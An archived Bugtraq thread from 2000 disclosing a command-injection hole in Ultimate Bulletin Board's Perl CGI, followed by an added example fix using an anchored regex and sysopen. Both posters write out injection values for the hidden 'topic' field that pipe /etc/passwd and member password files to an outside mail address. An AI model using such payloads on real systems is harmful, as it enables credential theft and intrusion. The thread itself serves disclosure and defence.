It works on the full version also... Slightly different syntax:

    topic=012345.cgi|cat%20../Members/*|mail hackerat_private|

(Note the ../ on the Members. You have to go up a directory to get the
file. Maybe you could stop it via simple folder permissions??)

Regards,
Kevin Hillabolt

----- Original Message -----
From: "Sergei A. Golubchik" <sergat_private>
To: <BUGTRAQat_private>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.

> Hello.
>
> Writing cgi scripts in perl is simple. It's also rather safe,
> providing authors follow very simple instructions. But they don't.
>
> Browsing some site, I found that their forums were based not on
> home-made scripts, but rather on a commercial software product. Hey,
> said I to myself, remember that story about the pcweek hack? They use
> the commercial package photoads. Let's look at what that Ultimate
> Bulletin Board by Infopop is.
>
> I grabbed the freeware version from http://www.ultimatebb.com and
> after 10 minutes of grepping found these lines:
>
> ubb_library.pl:901-902
>     if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
>         open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
>
> (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about
> while writing it? Girls?)
>
> And the $ThreadFile takes its value directly from the hidden (hmm!)
> field `topic'.
>
> So when I filled the form with
>     topic='012345.ubb|mail hackerat_private </etc/passwd|'
> it happily gives me /etc/passwd. And
>     topic='012345.ubb|cat Members/*|mail hackerat_private|'
> shows all users of the bulletin board, and their passwords too (in
> cleartext!).
>
> So one should only open the "reply" form in the forum, save it to
> disk, and set the topic field to whatever he wants. And this stupid
> UBB (at least the freeware version) doesn't keep logs (except the
> so-called hacklog, used when the condition above is not met).
>
> The fix is obvious. But the rule of thumb is "do not use magic perl
> open". At least in cgi scripts. If you want to open a regular file,
> sysopen does the trick as well.
>
> And again: CHECK EVERYTHING!
>
> Regards,
> SerG.
>
> P.S. Vendor was notified.
>
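The two fixes the post recommends (an anchored pattern and a non-magic open), as an added example that is not UBB's code and not from either poster; the $ForumsPath value and the sub names are assumptions, and the sample topic values are constructed:

```perl
#!/usr/bin/perl
# Added example: validate the `topic' value before opening the thread file,
# instead of passing it straight to Perl's two-argument open().
use strict;
use warnings;
use Fcntl qw(O_RDONLY);

my $ForumsPath = '/var/www/ubb/Forums';   # assumed layout, not a real path

# The unanchored check from ubb_library.pl: it only asks whether the
# pattern occurs *somewhere* in the string, so anything may surround it.
sub ubb_check { my ($t) = @_; return $t =~ /\d\d\d\d\d\d\.ubb/ ? 1 : 0 }

# Anchored check: the whole value must be six digits followed by ".ubb".
# \z (not $) also refuses a trailing newline. Returns the captured name,
# which is untainted under -T, or undef on failure.
sub safe_thread_file {
    my ($t) = @_;
    return unless defined $t && $t =~ /^(\d{6}\.ubb)\z/;
    return $1;
}

# sysopen() never interprets the name as a pipe or a mode prefix, so even
# an unexpected value cannot turn a file open into a command.
sub open_thread {
    my ($number, $topic) = @_;
    my $file = safe_thread_file($topic) or return;
    return unless defined $number && $number =~ /^\d+\z/;
    my $path = "$ForumsPath/Forum$number/$file";
    sysopen(my $fh, $path, O_RDONLY) or return;
    return $fh;
}

# Constructed inputs: only the first passes the anchored check, while the
# original test accepts all of them.
for my $t ('012345.ubb', '|012345.ubb|', '../012345.ubb', "012345.ubb\n") {
    (my $shown = $t) =~ s/\n/\\n/g;
    printf "%-16s unanchored=%d anchored=%s\n", $shown,
        ubb_check($t), defined safe_thread_file($t) ? 'ok' : 'rejected';
}
```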
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:53 PDT